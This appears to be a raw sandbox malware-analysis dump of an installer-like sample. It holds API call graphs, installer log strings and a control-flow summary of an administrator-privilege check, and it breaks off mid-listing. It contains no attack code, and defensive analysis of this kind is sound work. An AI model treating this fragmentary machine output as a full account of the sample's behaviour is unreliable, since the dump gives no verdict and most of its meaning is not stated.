53740->53741 53741->53696 53742->53702 53743->53702 53744->53702 53745->53664 53746->53702 53747->53702 53748->53687 53749->53702 53750->53702 53753 403494 4 API calls 53752->53753 53754 42cacc 53753->53754 53755 403744 4 API calls 53754->53755 53758 42cb02 53754->53758 53761 42c454 IsDBCSLeadByte 53754->53761 53755->53754 53757 42cb46 53757->53713 53758->53757 53760 4037b8 4 API calls 53758->53760 53762 42c454 IsDBCSLeadByte 53758->53762 53760->53758 53761->53754 53762->53758 53763->53723 53764->53727 53765->53732 53766->53397 53769 46aabf 53767->53769 53768 46af37 53770 46af52 53768->53770 53771 46af83 53768->53771 53769->53768 53772 46ab7a 53769->53772 53776 403494 4 API calls 53769->53776 53775 403494 4 API calls 53770->53775 53773 403494 4 API calls 53771->53773 53774 46ab9b 53772->53774 53778 46abdc 53772->53778 53777 46af91 53773->53777 53779 403494 4 API calls 53774->53779 53780 46af60 53775->53780 53781 46aafe 53776->53781 53871 4694c8 12 API calls 53777->53871 53784 403400 4 API calls 53778->53784 53786 46aba9 53779->53786 53870 4694c8 12 API calls 53780->53870 53783 414af8 4 API calls 53781->53783 53788 46ab1f 53783->53788 53789 46abda 53784->53789 53787 414af8 4 API calls 53786->53787 53791 46abca 53787->53791 53792 403634 4 API calls 53788->53792 53811 46acc0 53789->53811 53853 469bd4 53789->53853 53790 46af6e 53793 403400 4 API calls 53790->53793 53794 403634 4 API calls 53791->53794 53795 46ab2f 53792->53795 53797 46afb4 53793->53797 53794->53789 53799 414af8 4 API calls 53795->53799 53802 403400 4 API calls 53797->53802 53798 46ad48 53800 403400 4 API calls 53798->53800 53803 46ab43 53799->53803 53804 46ad46 53800->53804 53801 46abfc 53805 46ac02 53801->53805 53806 46ac3a 53801->53806 53807 46afbc 53802->53807 53803->53772 53813 414af8 4 API calls 53803->53813 53865 46a010 43 API calls 53804->53865 53809 403494 4 API calls 53805->53809 53808 403400 4 API calls 53806->53808 53810 403420 4 API calls 53807->53810 53812 46ac38 53808->53812 53814 46ac10 53809->53814 53815 46afc9 53810->53815 53811->53798 53816 46ad07 53811->53816 53859 469ec8 53812->53859 53818 46ab6a 53813->53818 53820 47bfd8 43 API calls 53814->53820 53815->53403 53817 403494 4 API calls 53816->53817 53821 46ad15 53817->53821 53822 403634 4 API calls 53818->53822 53824 46ac28 53820->53824 53825 414af8 4 API calls 53821->53825 53822->53772 53823 46ad71 53830 46add2 53823->53830 53831 46ad7c 53823->53831 53827 403634 4 API calls 53824->53827 53828 46ad36 53825->53828 53827->53812 53832 403634 4 API calls 53828->53832 53829 46ac61 53835 46acc2 53829->53835 53836 46ac6c 53829->53836 53834 403400 4 API calls 53830->53834 53833 403494 4 API calls 53831->53833 53832->53804 53842 46ad8a 53833->53842 53837 46adda 53834->53837 53838 403400 4 API calls 53835->53838 53839 403494 4 API calls 53836->53839 53840 46add0 53837->53840 53851 46ae83 53837->53851 53838->53811 53844 46ac7a 53839->53844 53840->53837 53866 494660 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53840->53866 53842->53837 53842->53840 53846 403634 4 API calls 53842->53846 53843 46adfd 53843->53851 53867 49490c 18 API calls 53843->53867 53844->53811 53847 403634 4 API calls 53844->53847 53846->53842 53847->53844 53849 46af24 53869 429154 SendMessageA SendMessageA 53849->53869 53868 429104 SendMessageA 53851->53868 53852->53405 53872 42a050 SendMessageA 53853->53872 53855 469be3 53856 469c03 53855->53856 53873 42a050 SendMessageA 53855->53873 53856->53801 53858 469bf3 53858->53801 53863 469ef5 53859->53863 53860 469f57 53861 403400 4 API calls 53860->53861 53862 469f6c 53861->53862 53862->53829 53863->53860 53874 469e4c 43 API calls 53863->53874 53865->53823 53866->53843 53867->53851 53868->53849 53869->53768 53870->53790 53871->53790 53872->53855 53873->53858 53874->53863 53876 47d9cf 53875->53876 53879 47da0c 53875->53879 53907 455cf8 53876->53907 53879->53411 53881 47da1f 53881->53411 53962 466a80 53882->53962 53885->53417 53887 42f57c 53886->53887 53888 42f59f GetActiveWindow GetFocus 53887->53888 53889 41eeb4 2 API calls 53888->53889 53890 42f5b6 53889->53890 53891 42f5d3 53890->53891 53892 42f5c3 RegisterClassA 53890->53892 53893 42f662 SetFocus 53891->53893 53894 42f5e1 CreateWindowExA 53891->53894 53892->53891 53895 403400 4 API calls 53893->53895 53894->53893 53896 42f614 53894->53896 53897 42f67e 53895->53897 53983 42428c 53896->53983 53902 49490c 18 API calls 53897->53902 53899 42f63c 53900 42f644 CreateWindowExA 53899->53900 53900->53893 53901 42f65a ShowWindow 53900->53901 53901->53893 53902->53455 53989 44b524 53903->53989 53905 466eab 53905->53461 53908 455d09 53907->53908 53909 455d16 53908->53909 53910 455d0d 53908->53910 53941 455adc 29 API calls 53909->53941 53933 4559fc 53910->53933 53913 455d13 53913->53879 53914 47d628 53913->53914 53920 47d726 53914->53920 53923 47d665 53914->53923 53915 47d6c9 53916 403420 4 API calls 53915->53916 53917 47d80e 53916->53917 53917->53881 53918 47954c 19 API calls 53918->53920 53920->53915 53920->53918 53924 47d77c 53920->53924 53921 4797f0 4 API calls 53921->53923 53922 47bfd8 43 API calls 53922->53924 53923->53915 53923->53920 53923->53921 53927 47bfd8 43 API calls 53923->53927 53931 47d6d2 53923->53931 53950 47968c 53923->53950 53924->53920 53924->53922 53926 4540ec 20 API calls 53924->53926 53928 47d713 53924->53928 53925 47bfd8 43 API calls 53925->53931 53926->53924 53927->53923 53928->53915 53929 42c93c 5 API calls 53929->53931 53930 42c964 5 API calls 53930->53931 53931->53923 53931->53925 53931->53928 53931->53929 53931->53930 53961 47d334 52 API calls 53931->53961 53934 42de2c RegOpenKeyExA 53933->53934 53935 455a19 53934->53935 53936 455a67 53935->53936 53942 455930 53935->53942 53936->53913 53939 455930 6 API calls 53940 455a48 RegCloseKey 53939->53940 53940->53913 53941->53913 53947 42dd68 53942->53947 53944 403420 4 API calls 53945 4559e2 53944->53945 53945->53939 53946 455958 53946->53944 53948 42dc10 6 API calls 53947->53948 53949 42dd71 53948->53949 53949->53946 53951 4796a2 53950->53951 53952 47969e 53950->53952 53953 403450 4 API calls 53951->53953 53952->53923 53954 4796af 53953->53954 53955 4796b5 53954->53955 53956 4796cf 53954->53956 53957 47954c 19 API calls 53955->53957 53958 47954c 19 API calls 53956->53958 53959 4796cb 53957->53959 53958->53959 53960 403400 4 API calls 53959->53960 53960->53952 53961->53931 53963 403494 4 API calls 53962->53963 53964 466aae 53963->53964 53965 42dbd8 5 API calls 53964->53965 53966 466ac0 53965->53966 53967 42dbd8 5 API calls 53966->53967 53968 466ad2 53967->53968 53969 46696c 19 API calls 53968->53969 53970 466adc 53969->53970 53971 42dbd8 5 API calls 53970->53971 53972 466aeb 53971->53972 53979 4669e4 53972->53979 53975 42dbd8 5 API calls 53976 466b04 53975->53976 53977 403400 4 API calls 53976->53977 53978 466b19 53977->53978 53978->53414 53980 466a04 53979->53980 53981 4078fc 19 API calls 53980->53981 53982 466a4e 53981->53982 53982->53975 53984 4242be 53983->53984 53985 42429e GetWindowTextA 53983->53985 53987 403494 4 API calls 53984->53987 53986 4034e0 4 API calls 53985->53986 53988 4242bc 53986->53988 53987->53988 53988->53899 53992 44b39c 53989->53992 53991 44b537 53991->53905 53993 44b3cf 53992->53993 53994 414af8 4 API calls 53993->53994 53995 44b3e2 53994->53995 53996 44b40f 7427A570 53995->53996 53997 40357c 4 API calls 53995->53997 54003 41a1f8 53996->54003 53997->53996 54000 44b440 54011 44b0d0 54000->54011 54002 44b454 7427A480 54002->53991 54004 41a223 54003->54004 54005 41a2bf 54003->54005 54008 403520 4 API calls 54004->54008 54006 403400 4 API calls 54005->54006 54007 41a2d7 SelectObject 54006->54007 54007->54000 54009 41a27b 54008->54009 54010 41a2b3 CreateFontIndirectA 54009->54010 54010->54005 54012 44b0e7 54011->54012 54013 44b17a 54012->54013 54014 44b163 54012->54014 54015 44b0fa 54012->54015 54013->54002 54016 44b173 DrawTextA 54014->54016 54015->54013 54017 402648 4 API calls 54015->54017 54016->54013 54018 44b10b 54017->54018 54019 44b129 MultiByteToWideChar DrawTextW 54018->54019 54020 402660 4 API calls 54019->54020 54021 44b15b 54020->54021 54021->54002 54024 465643 54022->54024 54023 46571e 54033 4673f8 54023->54033 54024->54023 54028 465693 54024->54028 54045 421a2c 54024->54045 54025 4656d6 54025->54023 54051 4185c8 7 API calls 54025->54051 54028->54025 54029 4656cd 54028->54029 54030 4656d8 54028->54030 54031 421a2c 7 API calls 54029->54031 54032 421a2c 7 API calls 54030->54032 54031->54025 54032->54025 54034 467428 54033->54034 54035 467409 54033->54035 54034->53476 54036 414b28 4 API calls 54035->54036 54037 467417 54036->54037 54038 414b28 4 API calls 54037->54038 54038->54034 54040 46b041 54039->54040 54041 421a2c 7 API calls 54040->54041 54042 46b0cc 54041->54042 54042->53499 54043 466ecc 18 API calls 54042->54043 54043->53499 54044->53500 54047 421a84 54045->54047 54050 421a3a 54045->54050 54047->54028 54049 421a69 54049->54047 54060 421d38 SetFocus GetFocus 54049->54060 54050->54049 54052 408cc4 54050->54052 54051->54023 54053 408cd0 54052->54053 54061 406df4 LoadStringA 54053->54061 54056 403450 4 API calls 54057 408d01 54056->54057 54058 403400 4 API calls 54057->54058 54059 408d16 54058->54059 54059->54049 54060->54047 54062 4034e0 4 API calls 54061->54062 54063 406e21 54062->54063 54063->54056 54065 402648 4 API calls 54064->54065 54066 47dc4c 54065->54066 54067 47d628 61 API calls 54066->54067 54068 47dc6b 54067->54068 54069 47dc7f 54068->54069 54080 47da48 54068->54080 54071 47dcab 54069->54071 54073 402660 4 API calls 54069->54073 54072 402660 4 API calls 54071->54072 54074 47dcb5 54072->54074 54073->54069 54074->53504 54075->53529 54076->53524 54081 403494 4 API calls 54080->54081 54096 47da75 54081->54096 54094 42c93c 5 API calls 54094->54096 54096->54094 54099 47dac8 54096->54099 54100 42e8b0 CharNextA 54096->54100 54100->54096 54103 46ca4d 54102->54103 54104 46ca9a 54103->54104 54105 414af8 4 API calls 54103->54105 54107 403420 4 API calls 54104->54107 54106 46ca63 54105->54106 54301 466c90 6 API calls 54106->54301 54109 46cb44 54107->54109 54109->53556 54293 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54109->54293 54110 46ca6b 54111 414b28 4 API calls 54110->54111 54112 46ca79 54111->54112 54113 46ca86 54112->54113 54116 46ca9f 54112->54116 54302 47eadc 42 API calls 54113->54302 54115 46cab7 54303 47eadc 42 API calls 54115->54303 54116->54115 54117 466d74 CharNextA 54116->54117 54119 46cab3 54117->54119 54119->54115 54120 46cacd 54119->54120 54121 46cad3 54120->54121 54122 46cae9 54120->54122 54304 47eadc 42 API calls 54121->54304 54124 42c9ac CharNextA 54122->54124 54125 46caf6 54124->54125 54125->54104 54305 466e00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54125->54305 54127 46cb0d 54128 451444 4 API calls 54127->54128 54129 46cb1a 54128->54129 54306 47eadc 42 API calls 54129->54306 54132 481f8d 54131->54132 54133 481f5f 54131->54133 54135 475dbc 54132->54135 54307 4946bc 18 API calls 54133->54307 54136 457b4c 24 API calls 54135->54136 54137 475e08 54136->54137 54138 4072b0 SetCurrentDirectoryA 54137->54138 54139 475e12 54138->54139 54308 46e5b0 54139->54308 54143 475e22 54294->53564 54301->54110 54302->54104 54303->54104 54304->54104 54305->54127 54306->54104 54307->54132 54309 46e623 54308->54309 54311 46e5cd 54308->54311 54312 46e628 54309->54312 54310 47968c 19 API calls 54310->54311 54311->54309 54311->54310 54313 46e64e 54312->54313 54756 44fb08 54313->54756 54315 46e6aa 54315->54143 54759 44fb1c 54756->54759 54760 44fb2d 54759->54760 54761 44fb19 54760->54761 54762 44fb57 MulDiv 54760->54762 54761->54315 54763 4181f0 54762->54763 54764 44fb82 SendMessageA 54763->54764 54764->54761 56176 498578 56234 403344 56176->56234 56178 498586 56237 4056a0 56178->56237 56180 49858b 56240 406334 GetModuleHandleA GetProcAddress 56180->56240 56186 49859a 56257 410964 56186->56257 56188 49859f 56261 412938 56188->56261 56190 4985a9 56266 419050 GetVersion 56190->56266 56507 4032fc 56234->56507 56236 403349 GetModuleHandleA GetCommandLineA 56236->56178 56239 4056db 56237->56239 56508 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56237->56508 56239->56180 56241 406350 56240->56241 56242 406357 GetProcAddress 56240->56242 56241->56242 56243 406366 56242->56243 56244 40636d GetProcAddress 56242->56244 56243->56244 56245 406380 56244->56245 56246 40637c SetProcessDEPPolicy 56244->56246 56247 409954 56245->56247 56246->56245 56509 40902c 56247->56509 56252 408728 7 API calls 56253 409977 56252->56253 56524 409078 GetVersionExA 56253->56524 56256 409b88 6FDA1CD0 56256->56186 56258 41096e 56257->56258 56259 4109ad GetCurrentThreadId 56258->56259 56260 4109c8 56259->56260 56260->56188 56526 40af0c 56261->56526 56265 412964 56265->56190 56538 41de34 8 API calls 56266->56538 56268 419069 56540 418f48 GetCurrentProcessId 56268->56540 56507->56236 56508->56239 56510 408cc4 5 API calls 56509->56510 56511 40903d 56510->56511 56512 4085e4 GetSystemDefaultLCID 56511->56512 56516 40861a 56512->56516 56513 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56513->56516 56514 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56514->56516 56515 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56515->56516 56516->56513 56516->56514 56516->56515 56520 40867c 56516->56520 56517 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56517->56520 56518 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56518->56520 56519 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 56519->56520 56520->56517 56520->56518 56520->56519 56521 4086ff 56520->56521 56522 403420 4 API calls 56521->56522 56523 408719 56522->56523 56523->56252 56525 40908f 56524->56525 56525->56256 56527 40af13 56526->56527 56528 40af32 56527->56528 56537 40ae44 19 API calls 56527->56537 56530 41101c 56528->56530 56531 41103e 56530->56531 56532 406df4 5 API calls 56531->56532 56533 403450 4 API calls 56531->56533 56534 41105d 56531->56534 56532->56531 56533->56531 56535 403400 4 API calls 56534->56535 56536 411072 56535->56536 56536->56265 56537->56527 56539 41deae 56538->56539 56539->56268 56556 4078c8 56540->56556 57815 42f530 57816 42f53b 57815->57816 57817 42f53f NtdllDefWindowProc_A 57815->57817 57817->57816 55808 416b52 55809 416bfa 55808->55809 55810 416b6a 55808->55810 55827 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55809->55827 55812 416b84 SendMessageA 55810->55812 55813 416b78 55810->55813 55823 416bd8 55812->55823 55814 416b82 CallWindowProcA 55813->55814 55815 416b9e 55813->55815 55814->55823 55824 41a068 GetSysColor 55815->55824 55818 416ba9 SetTextColor 55819 416bbe 55818->55819 55825 41a068 GetSysColor 55819->55825 55821 416bc3 SetBkColor 55826 41a6f0 GetSysColor CreateBrushIndirect 55821->55826 55824->55818 55825->55821 55826->55823 55827->55823 57818 4358f0 57819 435905 57818->57819 57823 43591f 57819->57823 57824 4352d8 57819->57824 57828 435322 57824->57828 57829 435308 57824->57829 57825 403400 4 API calls 57826 435727 57825->57826 57826->57823 57837 435738 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57826->57837 57827 446db4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57827->57829 57828->57825 57829->57827 57829->57828 57830 402648 4 API calls 57829->57830 57831 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57831 57833 431cb0 4 API calls 57829->57833 57834 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57834 57835 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57835 57838 4343c0 57829->57838 57850 434b84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57829->57850 57830->57829 57831->57829 57833->57829 57834->57829 57835->57829 57837->57823 57839 43447d 57838->57839 57840 4343ed 57838->57840 57869 434320 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57839->57869 57841 403494 4 API calls 57840->57841 57843 4343fb 57841->57843 57844 403778 4 API calls 57843->57844 57848 43441c 57844->57848 57845 403400 4 API calls 57846 4344cd 57845->57846 57846->57829 57847 43446f 57847->57845 57848->57847 57851 494314 57848->57851 57850->57829 57852 49434c 57851->57852 57853 4943e4 57851->57853 57854 403494 4 API calls 57852->57854 57870 448940 57853->57870 57859 494357 57854->57859 57856 494367 57857 403400 4 API calls 57856->57857 57858 494408 57857->57858 57860 403400 4 API calls 57858->57860 57859->57856 57861 4037b8 4 API calls 57859->57861 57862 494410 57860->57862 57863 494380 57861->57863 57862->57848 57863->57856 57864 4037b8 4 API calls 57863->57864 57865 4943a3 57864->57865 57866 403778 4 API calls 57865->57866 57867 4943d4 57866->57867 57868 403634 4 API calls 57867->57868 57868->57853 57869->57847 57871 448965 57870->57871 57881 4489a8 57870->57881 57872 403494 4 API calls 57871->57872 57874 448970 57872->57874 57877 4037b8 4 API calls 57874->57877 57875 4489bc 57876 403400 4 API calls 57875->57876 57878 4489ef 57876->57878 57879 44898c 57877->57879 57878->57856 57880 4037b8 4 API calls 57879->57880 57880->57881 57881->57875 57882 44853c 57881->57882 57883 403494 4 API calls 57882->57883 57884 448572 57883->57884 57885 4037b8 4 API calls 57884->57885 57886 448584 57885->57886 57887 403778 4 API calls 57886->57887 57888 4485a5 57887->57888 57889 4037b8 4 API calls 57888->57889 57890 4485bd 57889->57890 57891 403778 4 API calls 57890->57891 57892 4485e8 57891->57892 57893 4037b8 4 API calls 57892->57893 57895 448600 57893->57895 57894 4486d3 57899 4486db GetProcAddress 57894->57899 57895->57894 57897 44865b LoadLibraryExA 57895->57897 57898 44866d LoadLibraryA 57895->57898 57902 448638 57895->57902 57903 403b80 4 API calls 57895->57903 57904 403450 4 API calls 57895->57904 57906 43da98 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57895->57906 57896 403420 4 API calls 57900 448718 57896->57900 57897->57895 57898->57895 57901 4486ee 57899->57901 57900->57875 57901->57902 57902->57896 57903->57895 57904->57895 57906->57895 57907 40ce34 57910 406f18 WriteFile 57907->57910 57911 406f35 57910->57911 55828 416654 55829 416661 55828->55829 55830 4166bb 55828->55830 55836 416560 CreateWindowExA 55829->55836 55837 4162da 55829->55837 55831 416668 SetPropA SetPropA 55831->55830 55832 41669b 55831->55832 55833 4166ae SetWindowPos 55832->55833 55833->55830 55836->55831 55838 416306 55837->55838 55839 4162e6 GetClassInfoA 55837->55839 55838->55831 55839->55838 55840 4162fa GetClassInfoA 55839->55840 55840->55838 57912 4222f4 57913 422303 57912->57913 57918 421284 57913->57918 57916 422323 57919 4212f3 57918->57919 57933 421293 57918->57933 57922 421304 57919->57922 57943 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 57919->57943 57921 421332 57925 4213a5 57921->57925 57930 42134d 57921->57930 57922->57921 57924 4213ca 57922->57924 57923 4213a3 57926 4213f6 57923->57926 57945 421e3c 11 API calls 57923->57945 57924->57923 57928 4213de SetMenu 57924->57928 57925->57923 57932 4213b9 57925->57932 57946 4211cc 10 API calls 57926->57946 57928->57923 57930->57923 57936 421370 GetMenu 57930->57936 57931 4213fd 57931->57916 57941 4221f8 10 API calls 57931->57941 57935 4213c2 SetMenu 57932->57935 57933->57919 57942 408d34 19 API calls 57933->57942 57935->57923 57937 421393 57936->57937 57938 42137a 57936->57938 57944 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 57937->57944 57940 42138d SetMenu 57938->57940 57940->57937 57941->57916 57942->57933 57943->57922 57944->57923 57945->57926 57946->57931 57947 44b4b8 57948 44b4c6 57947->57948 57950 44b4e5 57947->57950 57949 44b39c 11 API calls 57948->57949 57948->57950 57949->57950 57951 448738 57952 448766 57951->57952 57953 44876d 57951->57953 57955 403400 4 API calls 57952->57955 57954 448781 57953->57954 57956 44853c 7 API calls 57953->57956 57954->57952 57957 403494 4 API calls 57954->57957 57959 448917 57955->57959 57956->57954 57958 44879a 57957->57958 57960 4037b8 4 API calls 57958->57960 57961 4487b6 57960->57961 57962 4037b8 4 API calls 57961->57962 57963 4487d2 57962->57963 57963->57952 57964 4487e6 57963->57964 57965 4037b8 4 API calls 57964->57965 57966 448800 57965->57966 57967 431be0 4 API calls 57966->57967 57968 448822 57967->57968 57969 431cb0 4 API calls 57968->57969 57974 448842 57968->57974 57969->57968 57970 448898 57983 442344 57970->57983 57972 448880 57972->57970 57995 4435e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57972->57995 57974->57972 57994 4435e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57974->57994 57976 4488cc GetLastError 57996 4484d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57976->57996 57978 4488db 57997 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57978->57997 57980 4488f0 57998 443630 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57980->57998 57982 4488f8 57984 443322 57983->57984 57985 44237d 57983->57985 57987 403400 4 API calls 57984->57987 57986 403400 4 API calls 57985->57986 57988 442385 57986->57988 57989 443337 57987->57989 57990 431be0 4 API calls 57988->57990 57989->57976 57991 442391 57990->57991 57992 443312 57991->57992 57999 441a1c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57991->57999 57992->57976 57994->57974 57995->57970 57996->57978 57997->57980 57998->57982 57999->57991 58000 4165fc 74285CF0 58001 42e3ff SetErrorMode
                                                                            Strings
                                                                            • .tmp, xrefs: 0047125F
                                                                            • Dest filename: %s, xrefs: 00470B3C
                                                                            • Existing file is a newer version. Skipping., xrefs: 00470EAA
                                                                            • Stripped read-only attribute., xrefs: 0047116F
                                                                            • @, xrefs: 00470A58
                                                                            • Time stamp of existing file: (failed to read), xrefs: 00470CDF
                                                                            • Incrementing shared file count (32-bit)., xrefs: 00471833
                                                                            • InUn, xrefs: 004713ED
                                                                            • Time stamp of our file: (failed to read), xrefs: 00470C4F
                                                                            • Existing file has a later time stamp. Skipping., xrefs: 00471077
                                                                            • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470F6C
                                                                            • Version of existing file: (none), xrefs: 00470FA2
                                                                            • User opted not to overwrite the existing file. Skipping., xrefs: 004710F5
                                                                            • Version of our file: %u.%u.%u.%u, xrefs: 00470D98
                                                                            • Time stamp of existing file: %s, xrefs: 00470CD3
                                                                            • Couldn't read time stamp. Skipping., xrefs: 00470FDD
                                                                            • Time stamp of our file: %s, xrefs: 00470C43
                                                                            • Dest file is protected by Windows File Protection., xrefs: 00470B95
                                                                            • Same time stamp. Skipping., xrefs: 00470FFD
                                                                            • Installing into GAC, xrefs: 004719A2
                                                                            • -- File entry --, xrefs: 004709A3
                                                                            • Skipping due to "onlyifdestfileexists" flag., xrefs: 004711A2
                                                                            • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470F78
                                                                            • Failed to strip read-only attribute., xrefs: 0047117B
                                                                            • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0047113E
                                                                            • , xrefs: 00470E77, 00471048, 004710C6
                                                                            • Will register the file (a DLL/OCX) later., xrefs: 004717AD
                                                                            • Non-default bitness: 64-bit, xrefs: 00470B57
                                                                            • Uninstaller requires administrator: %s, xrefs: 0047141D
                                                                            • Same version. Skipping., xrefs: 00470F8D
                                                                            • Installing the file., xrefs: 004711B1
                                                                            • Incrementing shared file count (64-bit)., xrefs: 0047181A
                                                                            • Version of our file: (none), xrefs: 00470DA4
                                                                            • Version of existing file: %u.%u.%u.%u, xrefs: 00470E24
                                                                            • Skipping due to "onlyifdoesntexist" flag., xrefs: 00470C76
                                                                            • Dest file exists., xrefs: 00470C63
                                                                            • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470F5D
                                                                            • Existing file is protected by Windows File Protection. Skipping., xrefs: 00471094
                                                                            • Will register the file (a type library) later., xrefs: 004717A1
                                                                            • Non-default bitness: 32-bit, xrefs: 00470B63
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                            • API String ID: 0-4021121268
                                                                            • Opcode ID: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                                            • Instruction ID: 00dcbbebc37e67597ddb11db3b00c056d98a3663d13b65a1c96947d1bb872b77
                                                                            • Opcode Fuzzy Hash: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                                            • Instruction Fuzzy Hash: 2C927534A04288DFDB11DFA9C845BDDBBB5AF05304F5480ABE848AB392C7789E45CB59

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1546 42e0ac-42e0bd 1547 42e0c8-42e0ed AllocateAndInitializeSid 1546->1547 1548 42e0bf-42e0c3 1546->1548 1549 42e297-42e29f 1547->1549 1550 42e0f3-42e110 GetVersion 1547->1550 1548->1549 1551 42e112-42e127 GetModuleHandleA GetProcAddress 1550->1551 1552 42e129-42e12b 1550->1552 1551->1552 1553 42e152-42e16c GetCurrentThread OpenThreadToken 1552->1553 1554 42e12d-42e13b CheckTokenMembership 1552->1554 1557 42e1a3-42e1cb GetTokenInformation 1553->1557 1558 42e16e-42e178 GetLastError 1553->1558 1555 42e141-42e14d 1554->1555 1556 42e279-42e28f FreeSid 1554->1556 1555->1556 1559 42e1e6-42e20a call 402648 GetTokenInformation 1557->1559 1560 42e1cd-42e1d5 GetLastError 1557->1560 1561 42e184-42e197 GetCurrentProcess OpenProcessToken 1558->1561 1562 42e17a-42e17f call 4031bc 1558->1562 1573 42e218-42e220 1559->1573 1574 42e20c-42e216 call 4031bc * 2 1559->1574 1560->1559 1564 42e1d7-42e1e1 call 4031bc * 2 1560->1564 1561->1557 1563 42e199-42e19e call 4031bc 1561->1563 1562->1549 1563->1549 1564->1549 1576 42e222-42e223 1573->1576 1577 42e253-42e271 call 402660 CloseHandle 1573->1577 1574->1549 1580 42e225-42e238 EqualSid 1576->1580 1584 42e23a-42e247 1580->1584 1585 42e24f-42e251 1580->1585 1584->1585 1588 42e249-42e24d 1584->1588 1585->1577 1585->1580 1588->1577
                                                                            APIs
                                                                            • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0E6
                                                                            • GetVersion.KERNEL32(00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E103
                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11C
                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E122
                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E137
                                                                            • FreeSid.ADVAPI32(00000000,0042E297,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E28A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
